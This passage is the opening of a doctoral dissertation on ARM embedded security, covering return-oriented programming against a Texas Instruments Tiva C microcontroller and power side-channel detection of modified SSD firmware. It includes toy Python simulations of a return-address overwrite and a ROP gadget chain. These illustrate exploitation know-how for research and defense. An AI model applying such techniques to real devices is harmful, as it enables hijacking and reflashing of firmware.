Analysis of Security in Embedded ARM Environments

Dane A. Brown

Dissertation submitted to the Faculty of the Virginia Polytechnic Institute and State University in partial fulfillment of the requirements for the degree of

Doctor of Philosophy in Computer Engineering

T. Charles Clancy, Chair
Ryan Gerdes
Yaling Yang
Jonathan Black
Patrick Schaumont

August 13, 2019
Arlington, Virginia

Keywords: Security, Firmware, Embedded Devices, ARM

Copyright 2019, Dane A. Brown

Analysis of Firmware Security in Embedded ARM Environments

Dane A. Brown

(ABSTRACT)

Modern enterprise-grade systems with virtually unlimited resources have many options when it comes to implementing state-of-the-art intrusion prevention and detection solutions. These solutions are costly in terms of energy, execution time, circuit board area, and capital. Sustainable devices and power-constrained embedded systems are thus forced to make suboptimal security trade-offs. One such trade-off is the design of architectures which prevent execution of injected shell code, yet have allowed Return Oriented Programming (ROP) to emerge as a more reliable way to execute malicious code following attacks. ROP is a method used to take over the execution of a program by causing the return address of a function to be modified through an exploit vector, then returning to small segments of otherwise innocuous code located in executable memory, one after the other, to carry out the attacker's aims. We show that the Tiva TM4C123GH6PM, which utilizes an ARM Cortex-M4F processor, can be fully controlled with this technique. Firmware code is pre-loaded into a ROM on the Tiva which can be subverted to erase and rewrite the flash memory where the program resides. That same firmware is searched for a Turing-complete gadget set which allows for arbitrary execution. We then design and evaluate a method for verifying the integrity of firmware on embedded systems, in this case Solid State Drives (SSDs). Some manufacturers make firmware updates available, but their proprietary protections leave end users unable to verify the authenticity of the firmware post installation. This means that attackers who are able to get a malicious firmware version installed on a victim SSD are able to operate with full impunity, as the owner will have no tools for detection. We have devised a method for performing side channel analysis of the current drawn by an SSD, which can compare its behavior while running genuine firmware against its behavior when running modified firmware.
We train a binary classifier with samples of both versions and are able to consistently discriminate between genuine firmware and modified firmware, even despite changes in external factors such as temperature and supplied power.

Analysis of Firmware Security in Embedded ARM Environments

Dane A. Brown

(GENERAL AUDIENCE ABSTRACT)

To most consumers and enterprises, a computer is the desktop or laptop device they use to run applications or write reports. Security for these computers has been a top priority since the advent of the Internet, and the security landscape has matured considerably since that time. Yet these consumer-facing computers are outnumbered several times over by embedded computers and microcontrollers which power ubiquitous systems in industrial control, home automation, and the Internet of Things. Unfortunately, the security landscape for these embedded systems is in relative infancy. Security controls designed for consumer and enterprise computers are often poorly suited to embedded systems due to constraints such as power, memory, processing, and real-time performance demands. This research considers the unique constraints of embedded systems and analyzes their security in a practical way. We begin by exploring the mechanism and extent to which a device can be compromised. We show that a technique known as Return Oriented Programming (ROP) can be used to bypass some of the process control protections in place and that there can be enough existing code in the firmware to allow an attacker to execute code at will. This leads naturally to the question of how embedded computers can be secured. One important security assurance is the knowledge that a device is running legitimate firmware. This can be difficult for a device owner to verify due to proprietary protections put in place by manufacturers. However, we contribute a method to detect modifications to firmware on embedded systems, particularly Solid State Drives. This is done through an analysis of the current drawn during drive operations with best-practice data classification techniques. The findings of this research indicate that current embedded devices present a larger attack surface, require less sophistication to attack, and are vulnerable to attack in greater numbers.
Even though these findings should raise concern, we also found that there are practical methods for detecting attack via monitoring and analysis.

Dedication

I dedicate this work to my wife, Jennifer, my daughter, Elliana, my son, Edison, and my mother, Roberta. Jennifer has sacrificed her time and goals selflessly as I have pursued this Ph.D. My children have been my biggest cheerleaders and have always been there to lift my spirits. My mother has been a constant source of support, whether I needed childcare or just a word of encouragement. I am eternally grateful to my family for their love and support. Finally, I dedicate this work to my God above for giving me the determination and stamina to complete this process in the midst of several demanding life obligations.

Acknowledgments

I would like to first acknowledge my committee chair, Dr. T. Charles Clancy, for his guidance throughout this daunting process. I also acknowledge the constructive criticism and outside perspectives offered by the rest of my committee: Dr. Ryan Gerdes, Dr. Yaling Yang, Dr. Patrick Schaumont, and Dr. Jonathan Black. I need to acknowledge those who helped me perform the research, starting with Dr. Nathanael Weidler, who was my chief collaborator on the Return Oriented Programming work. I also need to thank my research group at the U.S. Naval Academy, the Computer Engineering and Cyber Security Research group (CECSR); in particular, Dr. T. Owens Walker, Dr. Robert Ives, Dr. Justin Blanco, and Dr. Ryan Rakvic worked very closely with me to plan, collect, and analyze data for the Solid State Drive research. Finally, I would like to thank the students and interns who volunteered their time to assist me in data collection and script writing: Midshipman Rupam Mondal, Ensign Zachary Johnson, Mr. Bernie Cieplak, Mr. Ryan McDowell, and Mr. Tsegazeab Beteselassie.

Contents

List of Figures vii

List of Tables xi

1 Introduction 1

1.1 Vulnerability of Embedded Systems ...... 3

1.2 Ubiquitous Microcontrollers ...... 4

1.2.1 Rapid Prototyping of Inexpensive Devices ...... 5

1.2.2 Internet of Things ...... 5

1.3 Review of Security Analysis Techniques ...... 6

1.3.1 Buffer Overflow Attacks ...... 6

1.3.2 Return Oriented Programming ...... 7

1.3.3 Side Channel Analysis ...... 8

1.3.4 Data Classification ...... 8

1.4 Thesis Statement and Research Questions ...... 9

1.5 Contributions ...... 10

1.5.1 Return Oriented Programming Contributions ...... 11

1.5.2 Detection of Modified Firmware Contributions ...... 12

1.6 Organization of the Dissertation ...... 13

2 Return Oriented Programming on Embedded Firmware 15

2.1 Microcontroller Security ...... 15

2.1.1 Security versus Sustainability ...... 16

2.1.2 Related Work ...... 18

2.1.3 Thumb Instruction Set ...... 19

2.1.4 Threat Model ...... 19

2.2 Return-Oriented Programming on ARM Architectures ...... 20

2.3 Erasing and Programming Flash Memory ...... 24

2.3.1 Finding Gadgets ...... 25

2.3.2 Reprogramming Method ...... 26

2.3.3 Demonstration of Writing a Simple Program to Flash ...... 29

2.3.4 Second Gadget Set ...... 31

2.4 Turing-complete Gadget Set ...... 34

2.4.1 Requirement ...... 37

2.4.2 Gadgets from the Tiva C ...... 37

2.5 Experimental Results ...... 49

3 Security Analysis of Solid State Drive Firmware 58

3.1 Solid State Drive Security ...... 58

3.2 Related Work ...... 59

3.3 Jasmine Flash Translation Layers ...... 62

3.4 Threat Model ...... 64

3.4.1 Ownership Trust Boundary ...... 64

3.4.2 Internet Trust Boundary ...... 67

3.4.3 Physical Trust Boundary ...... 67

3.4.4 Threat Model Review ...... 68

3.5 Malicious Code Injection ...... 68

3.5.1 Denying Garbage Collection ...... 69

3.5.2 Formatting NAND Flash ...... 70

3.5.3 Clearing DRAM Buffers ...... 71

4 Detection of Modified Firmware on Solid State Drives 73

4.1 Detecting Modified Firmware ...... 73

4.1.1 Data Collection Setup ...... 73

4.1.2 Data Processing ...... 74

4.1.3 Firmware Binary Classifier ...... 78

4.2 Classifying Different Levels of Modification ...... 83

4.3 Classifying at Different Temperatures ...... 86

4.4 Classifying with Different Power Supplies ...... 92

4.5 Classifying in Dynamic Conditions ...... 96

5 Conclusions 98

5.1 Future Work ...... 100

5.2 Closing ...... 101

Bibliography 103

Appendices 116

Appendix A Modified FTL Code - Clearing DRAM 117

List of Figures

2.1 Example of using a pop pc as a return...... 21

2.2 Stack Diagram - bx lr Return...... 23

2.3 Stack Diagram - move...... 38

2.4 Stack Diagram - load...... 39

2.5 Stack Diagram - load immediate...... 40

2.6 Stack Diagram - store...... 40

2.7 Stack Diagram - add...... 41

2.8 Stack Diagram - subtract...... 42

2.9 Stack Diagram - and...... 44

2.10 Stack Diagram - or...... 44

2.11 Stack Diagram - conditional branch...... 45

2.12 Stack Diagram - set less than...... 46

2.13 Delay Loop...... 48

2.14 Stack Diagram - xor...... 49

2.15 Move. The value contained in r4 moved to r0...... 50

2.16 Load. The value 0xDEADBEEF is loaded from memory location 0x20000FA4 to r0. Note that the stack pointer shows the bottom of the stack as 0x20000FC4 before execution begins...... 51

2.17 Load Immediate. The value 0xDEADBEEF is popped from the stack into r4 and then moved to r0...... 51

2.18 Store. The value 0xDEADBEEF is taken from the stack, placed in r0 and then written to memory location 0x20000FA8 which is 12 plus 0x20000F9C. ... 52

2.19 Add. The values 0x02020202 and 0x03030303 from the stack are added together and the result, 0x05050505, is placed in r1...... 52

2.20 Sub. The value 0x02020202 is subtracted from 0x03030303 (both values are found on the stack) and the result, 0x01010101, is placed in r0...... 53

2.21 And. The value 0x11111111 is placed in r3 and anded with the value, 0x76767676 already in r2. The result, 0x10101010 finishes in r2...... 53

2.22 Or. The two values 0xAAAAAAAA and 0xCCCCCCCC are taken from the stack and ored with each other. 0xEEEEEEEE is the result of that operation and it is placed in r0...... 54

2.23 Conditional Branch. The value 0x00000001 is placed in r2 which indicates to branch to the location found at memory location 0x20001010. If any other value besides 0x00000001 was placed in r2, the branch to the address located at 0x2000100C would have been followed...... 55

2.24 Set Less Than. The values 0x00000005 and 0x00000007 are tested. As the first value is less than the second, a 0x00000001 is placed in r0. If the first value was not less than the second value, a 0x00000000 would have been placed in r0...... 56

2.25 Delay Loop. 0x00000000 is initially loaded into r5 and 0x00000009 is loaded into r3. r5 is incremented until it equals r3 and then the loop finishes. The final value of 0x00000009 can be seen in both r5 and r3...... 57

3.1 OpenSSD project Jasmine development board [66] ...... 63

3.2 Threat Model of potential modifications to an SSD...... 65

3.3 Current over time comparison of Greedy and Garbage Collection Modified Greedy firmware ...... 70

3.4 Unmodified (red crosses) and Garbage Collection modified (blue circles) firmware observations plotted in the space of the first three principal components used in classification...... 71

3.5 Current over time comparison of Greedy and Greedy-50% firmware in [24]. . 72

4.1 The laboratory setup to write data to the SSD and measure current draw .. 74

4.2 Pre-processing Stage for a Single Current Recording...... 79

4.3 Processing Stage for a Batch of Current Recordings...... 81

4.4 Scatter plot of first 3 Principal Components for unmodified Greedy vs. Greedy- 50% firmware at 50C...... 82

4.5 Current over time comparison between Greedy and Greedy-100% firmware. . 85

4.6 Classifier performance vs. Greedy-X% ...... 87

4.7 Top view of Jasmine board set up for temperature data collection...... 88

4.8 Bottom view of Jasmine board with heating pad placement...... 89

4.9 Temperature settings compared to actual temperatures observed during a trial. 90

4.10 Current over time comparison between Greedy and Greedy-50% firmware both at 45C...... 91

4.11 Classifier performance vs. temperature (classifies Greedy and Greedy-50%). 93

4.12 Current over time comparison between Greedy and Greedy-50% firmware both using an external power supply...... 94

4.13 Robustness of Binary Classifiers with Power Supply changes (classifies Greedy and Greedy-50%). For each classifier (LR, QDA, kNN), accuracy bars are for the Internal Seasonic (left), External Dynapower (middle), and External EVGA (right) power supplies...... 95

4.14 QDA classifier performance trained and tested at each temperature...... 96

4.15 QDA classifier performance trained and tested with each power supply. ... 97

List of Tables

2.1 The ROP design...... 32

4.1 Accuracy of Binary Classifiers (% Modification of Firmware) ...... 86

4.2 Robustness of Binary Classifiers with Temperature Variation (with 50% Prob- ability of Modification) ...... 92

4.3 Robustness of Binary Classifiers with Power Supply (with 50% Probability of Modification) ...... 95

List of Abbreviations

APT Advanced Persistent Threat

ARM Advanced RISC Machine

DRAM Dynamic Random Access Memory

FTL Flash Translation Layer

GPIO General Purpose Input/Output

HDD Hard Disk Drive

IoT Internet of Things

k-NN k Nearest Neighbors

LR Logistic Regression

MMU Memory Management Unit

MPU Memory Protection Unit

PCA Principal Component Analysis

POS Point of Sale

PSU Power Supply Unit

QDA Quadratic Discriminant Analysis

ROM Read Only Memory

ROP Return Oriented Programming

SATA Serial Advanced Technology Attachment

SCADA Supervisory Control and Data Acquisition

SSD Solid State Drive

TEE Trusted Execution Environment

UART Universal Asynchronous Receiver/Transmitter

Chapter 1

Introduction

Embedded devices are emerging as key players on the security battlefield, both as targets and as weapons.

In order to cause deliberate, physical damage to an Iranian nuclear enrichment plant, the most sophisticated worm of its time, named Stuxnet, was created and released. This worm specifically sought out Supervisory Control and Data Acquisition (SCADA) systems that would be attached to vulnerable embedded Siemens controllers. These controllers were responsible for the speed at which the centrifuges would operate, and malicious code would cause them to operate at dangerous speeds with no digital indication to plant operators [59]. There were some interesting aspects to this attack that were not frequently implemented against embedded devices. For example, there were four zero day exploits (exploits for which no patch exists) used to ensure the worm had the highest chance of infection. Also, Stuxnet code was released remotely, not just from outside of the enrichment plant, but from outside of Iran, and had to cross an air gap (a zone with no network connection) to land inside the plant. This was done by spreading the worm via USB drives. When a USB drive was plugged into a computer infected with Stuxnet, it would store a copy of the worm to pass on to future systems into which the drive would be inserted. Once one of these drives was connected to a system within the enrichment plant, the worm bypassed the air gap [61]. This case is significant because it shows substantial attack resources being directed at the code running an embedded system. This particular embedded controller was a valuable target because, like many embedded devices, it was in control of a physical system where changes to the code could have tangible real-world effects.

Target is one of the most successful retail businesses in the United States. They had the staff and resources in place to provide strong defenses for their systems and networks. They also had a malware detection system installed specifically to detect potential data breaches. Yet, with all of these measures in place, they still suffered one of the largest data breaches in history. Despite their state-of-the-art defense, Target did not properly limit access to third party service providers [76]. When credentials were compromised from a company responsible for their climate control, Target allowed the attacker to use these credentials to move laterally within their network and eventually compromise their Point of Sale (POS) systems. These are the embedded systems at every checkout register where customers swipe their credit cards to pay for purchased items. With this POS malware in place, the attackers were able to exfiltrate unprecedented amounts of credit card data [67]. This particular incident is important as it highlights an embedded system, the POS device, as the focus of this significant data breach of sensitive financial information.

Bloomberg Businessweek published findings suggesting that Chinese agents were able to insert a backdoor into computer parts sold by an American company, Super Micro Computer Inc. (Supermicro) [77]. It was alleged that a small microchip was implanted onto server motherboards which could create a stealthy entry point for remote attackers into any network containing an altered system. This could have far-reaching impacts, as Supermicro products were reported to be deployed by some of the largest American technology firms, including Apple and Amazon. The significance of this report lies in the stealth factor of the alleged implant. The alleged microchip was “not much bigger than a grain of rice” and unlikely to be detected by any routine quality assurance procedures. Further, this incident is significant because it describes a realistic scenario where an embedded device is used as a weapon to compromise a connected system. Though this particular incident has been the subject of ongoing debate, the realization that this threat vector could undermine trust in systems once assumed to be secure meant that there would need to be significant advancement in the security of circuit boards [58] or in the ability to detect modifications when they occur [41].

These case studies reinforce the relevance of embedded systems to the security of an individual, a company, or a nation. The goal of this research is to empower end users with tools and methods to assess the security of their embedded devices. We first create a method which advances the state-of-the-art in vulnerability assessment by utilizing Return Oriented Programming (ROP) to hijack control flow of a system which would not be susceptible to a buffer overflow alone. We introduce a novel ROP gadget technique and demonstrate for the first time that Turing-complete code execution is possible through just the firmware distributed with an Advanced RISC Machine (ARM) architecture embedded system. Second, we devise a capability which advances the state-of-the-art in detecting potentially malicious firmware executing on an ARM architecture embedded device. We collect measurements of current drawn during device operation with both the modified firmware and the genuine firmware. These data are input for three different classifiers which are all able to distinguish these firmware variants with very high accuracy.

1.1 Vulnerability of Embedded Systems

Embedded systems have typically been custom designed as simplified systems that perform a task in an optimal way for a specific application. That optimization may come in the form of power consumption, speed, size, cost, or any number of other specifications. The embedded system may be a simple stand-alone device, or part of a larger and more complex machine [92]. Whereas embedded system design was once considered a long and expensive process, it is now possible - and commonplace - to use commodity hardware and implement embedded applications in a firmware or even a software layer.

This research addresses some of the problems and potential solutions for modern embedded systems. The rest of this chapter will introduce details about the landscape of embedded computing systems that leave them in their currently vulnerable state. These details include the prevalence of microcontrollers, the pace of development, the Internet of Things, and techniques for assessing device security.

1.2 Ubiquitous Microcontrollers

One report estimates that the number of microcontrollers, which are at the heart of modern embedded devices, will be 50 billion by 2019 [48]. While researchers and enterprises are becoming increasingly concerned about the security of data and communications in IoT devices, the majority of embedded systems will be non-IoT devices whose security risks can pose just as much danger (examples include digital cameras, 3-D printers, point-of-sale systems, and disk storage devices). Many versions of these products do not even contain networking capabilities, yet their operation makes it necessary to connect to a computer for initial configuration, data collection, or updates. This provides a window of opportunity for the networked computer to infect the embedded device or vice versa. The high level of implicit trust for these embedded systems which possess no inherent network functionality, combined with the lack of impetus to secure them, makes such devices an ideal vector for opportunistic exploitation. Until there is widespread recognition of this threat and application of appropriate security controls and monitoring for all embedded devices, end users will have to take responsibility for detecting and mitigating compromises of their embedded systems.

1.2.1 Rapid Prototyping of Inexpensive Devices

There is probably no better example of the rapid prototyping of embedded devices at the maker and hobbyist level than the 2012 introduction of the Raspberry Pi for only 35 U.S. dollars, a price which has since lowered to only 5 U.S. dollars with the Raspberry Pi Zero introduced in late 2015 [74]. We have also seen many other microcontroller development boards grow in popularity over the same time frame; examples include the Arduino, the BeagleBone, the Mbed, and the Tiva C from Texas Instruments, which is one of the subjects of this research. These devices are lowering the bar to commercial entry and allowing new, immature businesses to spawn and release new embedded devices or adaptations of existing devices without a rigorous development and testing pipeline. The result is an over-abundance of poorly tested, vulnerable products being purchased by consumers who are unaware of the security shortcomings.

1.2.2 Internet of Things

This trend of widespread access to embedded device production has had far-reaching impacts. It has enabled the Internet of Things (IoT) phenomenon, the connection of many devices to the Internet that were originally designed to be self-contained. It is estimated that there will be 20 billion IoT devices by 2020 [53]. Unfortunately, the first generation of these devices came with insufficient security design and controls. Customers are frequently being alerted to the inherent and newly discovered risks. Researchers and the IoT industry are now scrambling to create solutions that bring IoT security on par with that of more mature general purpose personal computers.

1.3 Review of Security Analysis Techniques

This section introduces the main techniques used to conduct this research. It begins with a discussion of a classic exploitation technique, the buffer overflow, then of its modern day successor, Return Oriented Programming. It concludes with an introduction to Side Channel Analysis, and the data analysis techniques used to create a classifier.

1.3.1 Buffer Overflow Attacks

The buffer overflow attack has been a go-to intrusion technique since it was fully described in Phrack magazine [72] over two decades ago. In its most basic form, a buffer overflow takes advantage of an oversight in software that allows an entity inserting data into a buffer to write more data than the space originally allocated to that buffer. The extra space the buffer now consumes was likely previously used to hold other data. The problem is that other segments of the code will still expect to find certain data at the location where it has now been overwritten by the oversized buffer.

In most cases, a buffer overflow just causes unpredictable behavior and may even cause a program, or the entire system, to crash. In the most fruitful cases, an attacker may be able to write meaningful data in places that are later referenced by the running process. Consider a basic example where the overwritten data lies in an accounting process and references a bank account balance. The attacker would be able to artificially inflate their own balance or wipe out the savings of another patron.

A final example shows the power of a buffer overflow not only to exploit a vulnerability but also to execute arbitrary code. Consider that the buffer overflow extends beyond the stack frame of the current function and is able to overwrite the return address to the calling function.

This would allow the attacker to insert an arbitrary address where execution will continue. Furthermore, the bytes of data the attacker has written onto the stack could contain valid byte code in the machine language of the target machine. If the return address chosen points to their own buffer containing this code, the attacker is able to fully take control of the execution of that process.
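The mechanics above can be sketched with a short simulation. This is a toy Python model of a stack frame, not real machine code: the 8-byte buffer, the saved frame pointer, and every address used here are invented for illustration.

```python
# Toy model of a stack frame: [buffer | saved frame ptr | return address].
# All layout details and addresses are hypothetical; real stacks vary by
# ABI and compiler.

def make_frame(buf_size=8):
    """Build a frame whose last 4 bytes hold the legitimate return address."""
    frame = bytearray(buf_size + 4 + 4)
    frame[buf_size + 4:] = (0x00001234).to_bytes(4, "little")
    return frame

def unsafe_copy(frame, data):
    """Mimics strcpy(): writes data with no bounds check on the buffer."""
    frame[:len(data)] = data

frame = make_frame()
# 8 bytes fill the buffer, 4 clobber the saved frame pointer, and the final
# 4 replace the return address with an attacker-chosen one.
payload = b"A" * 8 + b"B" * 4 + (0x20000FA4).to_bytes(4, "little")
unsafe_copy(frame, payload)

ret = int.from_bytes(frame[12:], "little")
print(hex(ret))  # the function would now "return" to 0x20000fa4
```

The same slice assignment that fills the buffer silently rewrites the return address, which is exactly the oversight a bounds check would prevent.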

1.3.2 Return Oriented Programming

The concept of return-oriented programming (ROP) was first introduced for x86 processors in 2007 by Hovav Shacham [82]. The motivation for this work was the memory policy of “write xor execute.” This policy specified that system memory regions could be either writable or executable, but not both. Typically, the region of memory which contains the stack and the heap would be set to be writable but not executable [8] and, during process execution, regions of memory containing code would be executable but no longer writable. This prevents code execution following basic buffer overflow attacks such as those outlined in the classic work, “Smashing the Stack for Fun and Profit” [72]. With ROP, the same technique is used to overflow a buffer, but instead of actually inserting instructions onto the stack, addresses and constants are placed on it. These addresses point to special segments of code, and the constants are used by that code. These special segments of code are called gadgets. The main difference between code injection and ROP is that the gadgets used in ROP are already somewhere in memory; no new code is introduced into the system. The attacker only needs to know the address of a gadget in order to force the processor to execute the instructions of the gadget at a time when it was not meant to be executed. The constant values on the stack are values that the gadgets use; for example, a gadget might load a value off the stack into a specific register.

Gadgets are short sequences of instructions that in the x86 world always end with a return instruction. The short sequence of code is meant to do a small amount of work towards the attacker’s goal and then the return instruction transfers program control to the next address on the stack, where the attacker has placed a subsequent gadget. In this way the attacker can carry out their nefarious purpose by piecing together snippets of executable code that already exist in the program’s memory. The attacker uses the program’s own code to carry out the attack. The beauty of this method is that it circumvents the “write xor execute” memory policy. This memory policy has been defeated elsewhere as well [69].
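As a concrete illustration, the dispatch loop below models this chaining in Python: the "stack" holds gadget addresses interleaved with constants, and each gadget's terminating return hands control to the next address on the stack. The gadget addresses and behaviors here are invented for the sketch, not taken from any real firmware.

```python
# Schematic ROP "machine". Each function stands in for a short instruction
# sequence ending in a return; the while loop plays the role of those returns,
# popping the next gadget address off the attacker-controlled stack.

regs = {"r0": 0, "r1": 0}
stack = []          # attacker-controlled stack; index 0 is the top
memory = {}         # sparse model of RAM

def pop_r0():       # like: pop {r0, pc}
    regs["r0"] = stack.pop(0)

def pop_r1():       # like: pop {r1, pc}
    regs["r1"] = stack.pop(0)

def add_r0_r1():    # like: add r0, r0, r1 ; pop {pc}
    regs["r0"] = (regs["r0"] + regs["r1"]) & 0xFFFFFFFF

def store_r0_at_r1():  # like: str r0, [r1] ; pop {pc}
    memory[regs["r1"]] = regs["r0"]

gadgets = {0x1000: pop_r0, 0x1004: pop_r1,
           0x1008: add_r0_r1, 0x100C: store_r0_at_r1}

# Chain: r0 = 2 + 3, then store the result at (made-up) address 0x20000000.
stack = [0x1000, 2, 0x1004, 3, 0x1008, 0x1004, 0x20000000, 0x100C]

while stack:
    pc = stack.pop(0)   # the "return": jump to the next gadget address
    gadgets[pc]()
```

Note that no new code is defined by the payload itself; the stack only names pre-existing gadgets and supplies their operands, which is the essence of the technique.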

The original ROP work [82] has been extended to many platforms. It was extended to SPARC, a fixed instruction length RISC architecture, by Buchanan et al. [25]. Checkoway et al. extended it to not require return instructions [30].

1.3.3 Side Channel Analysis

Side Channel Analysis is a process by which information about a system can be gleaned by passively observing its operations. This is in contrast to having full information about a system, such as a schematic, its code, or a debugging interface. In Side Channel Analysis, one must measure one or more parameters of a system during operation and compare those measurements to known data or make inferences. Common techniques include timing analysis, power analysis, electromagnetic analysis, fault analysis, and cache analysis. This work focuses on measuring power consumption during operations via current draw.

1.3.4 Data Classification

The purpose of collecting data from SSDs in this project is to be able to distinguish original firmware from modified firmware by its operating characteristics. This requires a consistent setup to collect data in each class, as well as assurances that there is a measurable change between the classes of data and that the difference is captured during the collection. The collected data must then be converted to the frequency domain, where the set of key features can be determined. At this point an analysis of similarity or difference can be conducted between all the training data points, which produces the criteria for follow-on classification of test data. The particular classification techniques used in this project are described in detail in Sections 4.1.2 and 4.1.3.
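A minimal end-to-end sketch of this pipeline, in Python with synthetic data, may make the steps concrete. The traces, their frequencies, and the plain k-NN classifier are stand-ins invented for illustration; the actual work uses measured SSD current recordings, PCA, and the classifiers described in Chapter 4.

```python
# Sketch: time-domain "current" traces -> frequency-domain features -> k-NN.
import cmath, math, random

random.seed(0)
N = 64  # samples per trace

def trace(freq, noise=0.05):
    """Synthetic current recording: a tone at `freq` cycles/trace plus noise."""
    return [math.sin(2 * math.pi * freq * n / N) + random.gauss(0, noise)
            for n in range(N)]

def features(x):
    """Magnitudes of a naive DFT: the frequency-domain representation."""
    return [abs(sum(x[n] * cmath.exp(-2j * math.pi * k * n / N)
                    for n in range(N))) for k in range(N // 2)]

def knn_predict(train, query, k=3):
    """k nearest neighbors by Euclidean distance over feature vectors."""
    dist = sorted((math.dist(f, query), label) for f, label in train)
    votes = [label for _, label in dist[:k]]
    return max(set(votes), key=votes.count)

# Pretend "genuine" firmware draws current dominated by 5 cycles/trace and
# "modified" firmware by 9 cycles/trace (made-up numbers).
train = [(features(trace(5)), "genuine") for _ in range(10)] + \
        [(features(trace(9)), "modified") for _ in range(10)]

print(knn_predict(train, features(trace(9))))  # -> modified
```

The frequency-domain step matters because it makes the feature vectors insensitive to where in time a drive operation happens to fall within a recording.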

1.4 Thesis Statement and Research Questions

The state of system security research has advanced rapidly in recent decades on both the attack and defense sides. Skilled and determined attackers, known as Advanced Persistent Threats (APTs), have more tools at their disposal than ever before, yet systems have become hardened over the years and it now takes more skill to compromise them than in previous years. Unfortunately, these security controls have not been applied uniformly to all systems. Embedded devices are often legacy systems designed in an era with less security attention and expertise, or they are developed by inexperienced designers who lack awareness of security best practices, or they are developed with heavy constraints on resources such that some security best practices are not followed. Given this lack of security, combined with the fact that embedded systems outnumber general purpose computers several times over and the increasing trend of embedded devices becoming networked and joining the IoT, it is clear that embedded system security needs to be a high research priority.

The goal of this research is to identify current weaknesses in ARM architecture based embedded firmware and to demonstrate a method for verifying the integrity of manufacturer-provided firmware.

The following questions are addressed:

• Can mitigations to buffer overflow attacks be bypassed on embedded devices to execute arbitrary code?

• Can one feasibly expect to find a Turing complete set of Return Oriented Programming Gadgets in the provided firmware of an embedded device?

• Are resource constrained embedded systems adequately hardened against remote exploitation?

• Can the operations of Solid State Drives be inferred via side channel analysis of power consumption?

• Can consumers characterize the firmware running on Solid State Drives and determine if it is authentic?

• Can a classifier of potentially malicious embedded system firmware be flexible and practical?

1.5 Contributions

This section explains the contributions that will be submitted to both the field of Return Oriented Programming and the field of Side Channel Analysis as applied to embedded devices.

1.5.1 Return Oriented Programming Contributions

Chapter 2 describes a microcontroller with a built-in code base and methods of compromising the control flow of this system. The main goals of this work are to demonstrate:

1. The ability to create a gadget set capable of erasing flash memory. This is the first step in taking control of a microcontroller and could also result in a denial of service.

2. The ability to create a gadget set capable of programming the region of flash memory that was previously erased. This is the second step in taking control of a microcontroller.

3. The ability to create a Turing-complete gadget set from the TivaWare ROM. This allows for arbitrary code execution with ROP.

4. That modern energy-efficient embedded devices lack sufficient security assurances for mission-critical applications.

The contributions of this chapter are as follows: It is shown that an ARM Cortex-M4F processor using the Thumb-2 instruction set can be forced to execute arbitrary code. Specifically, the processor of the Texas Instruments Tiva TM4C123GH6PM microcontroller is attacked and the results shared. Even a simple program loaded into main memory is sufficient to locate enough gadgets to carry out an attack. A small code base is vulnerable to many exploits.

We further show that the Tiva microcontrollers are particularly vulnerable because large portions of code, even code that may never be executed, are made available in the Read Only Memory (ROM) of the microcontroller. Included in this ROM are libraries which make interacting with peripherals such as a Universal Asynchronous Receiver/Transmitter (UART), General Purpose Input/Output (GPIO), and Ethernet controller easy. This code base is a treasure trove of potential gadgets for an attacker who has learned the technique of ROP. It is believed that the practice of loading this ROM with unnecessary code weakens the security of the microcontroller. The ROM is not, however, necessary to locate enough gadgets to carry out an attack.

Two sets of gadgets are shown, one taken from an example program in main memory and a second taken from the ROM. Buffer overflow techniques combined with ROP make this microcontroller an easy target for malicious attacks.

In addition to the above contributions, a novel gadget that loads the link register with the address of a pop of the program counter is discussed. A technique using this gadget, similar to the update-load-branch model [30], is introduced. This solution is simpler than the update-load-branch technique. A Turing-complete gadget set is also included. The search space for the gadget sets described below is restricted to the peripheral drivers loaded on the ROM of the Tiva C. Any program from main memory may be used to create a Turing-complete gadget set, if the appropriate gadgets can be located. The ROM was used here as an example because it ships pre-loaded on every Tiva C.

A novel gadget-chaining mechanism is set forth as well. We finally demonstrate the ability to manipulate the stack pointer which allows for efficient loops.

1.5.2 Detection of Modified Firmware Contributions

Chapter 4 describes a method of recording power data as an SSD operates and classifying whether the running firmware is authentic or modified based on its power signature. To properly secure SSDs, there must be systems in place to prevent and detect compromise, much like firewalls and anti-virus software do for host systems. Unfortunately, it is difficult for researchers to analyze SSD firmware to create protection and detection mechanisms because manufacturers treat it as intellectual property, tightly restricting access to it and to debugging tools. To overcome these obstacles, researchers must resort to reverse engineering SSD hardware and firmware or analyzing their behavior through a side channel. Chapter 4 attempts to motivate research towards security of embedded devices by describing a method of performing side channel analysis of current draw from an SSD to classify the firmware it is running. To this end, it offers the following contributions:

1. Develops a collection technique leveraging ground truth data generated from modifications to open source SSD firmware that can potentially be extended to the side channel analysis of proprietary firmware.

2. Demonstrates a method designed to facilitate classification of potentially modified firmware.

3. Demonstrates that a classifier of firmware can be resilient to changes in its environment such as temperature.

4. Demonstrates that a firmware classifier can be resilient to hardware configuration changes such as the power supply.

5. Develops a threat model to assist manufacturers and end users in assessing risk to SSD firmware.

1.6 Organization of the Dissertation

Chapter 2 gives an introduction to the modern flow control technique of Return Oriented Programming and describes its utility as part of an attack. It goes on to describe how this technique can execute malicious payloads, such as erasing and reprogramming flash memory (Section 2.3) or executing arbitrary code through the discovery of a Turing complete set of gadgets (Section 2.4).

Chapter 3 introduces the Solid State Drive as a proprietary appliance for which the user has no means to verify that security requirements are being met or to determine whether the device has been compromised. It describes an open source SSD firmware implementation (Section 3.3) and a threat model for attacks on firmware integrity (Section 3.4). Section 3.5 demonstrates potential malicious modifications to SSD firmware.

Chapter 4 discusses the process for collecting modified firmware current draw data and classifying it apart from the original firmware (Section 4.1). It then tests the robustness of the classifier by testing it against different levels of modification (Section 4.2), modifications at different temperatures (Section 4.3), and modifications while connected to different power supplies (Section 4.4).

Chapter 5 summarizes the dissertation and motivates potential future work. The Appendix includes the modified version of Solid State Drive (SSD) firmware that was used to collect current draw data and compare to the original version.

Chapter 2

Return Oriented Programming on Embedded Firmware

This chapter is adapted from work in [94].

2.1 Microcontroller Security

Energy-efficient microcontrollers are becoming increasingly important as the Internet of Things and the Internet of Everything become a real part of life. Everything from wearables to remote sensors becomes more feasible when it consumes less power, making it less expensive to operate. Battery-operated devices also last longer, allowing them to fulfill their missions for longer periods of time. The Tiva TM4C123GH6PM (Tiva C) is advertised as a microcontroller capable of supporting applications such as low-power and hand-held smart devices [88].

The Tiva C makes use of an Advanced Reduced Instruction Set Computing (RISC) Machine (ARM) Cortex-M4F microprocessor, which ARM advertises as a low-power, low-cost solution. The Cortex-M4 processor has been developed for a broad range of embedded markets including automotive control systems, building automation, connective clothing, the energy grid, wearables, medical instrumentation, household appliances, and space applications, just to name a few [6]. ARM claims that tens of billions of ARM Cortex-M processors have


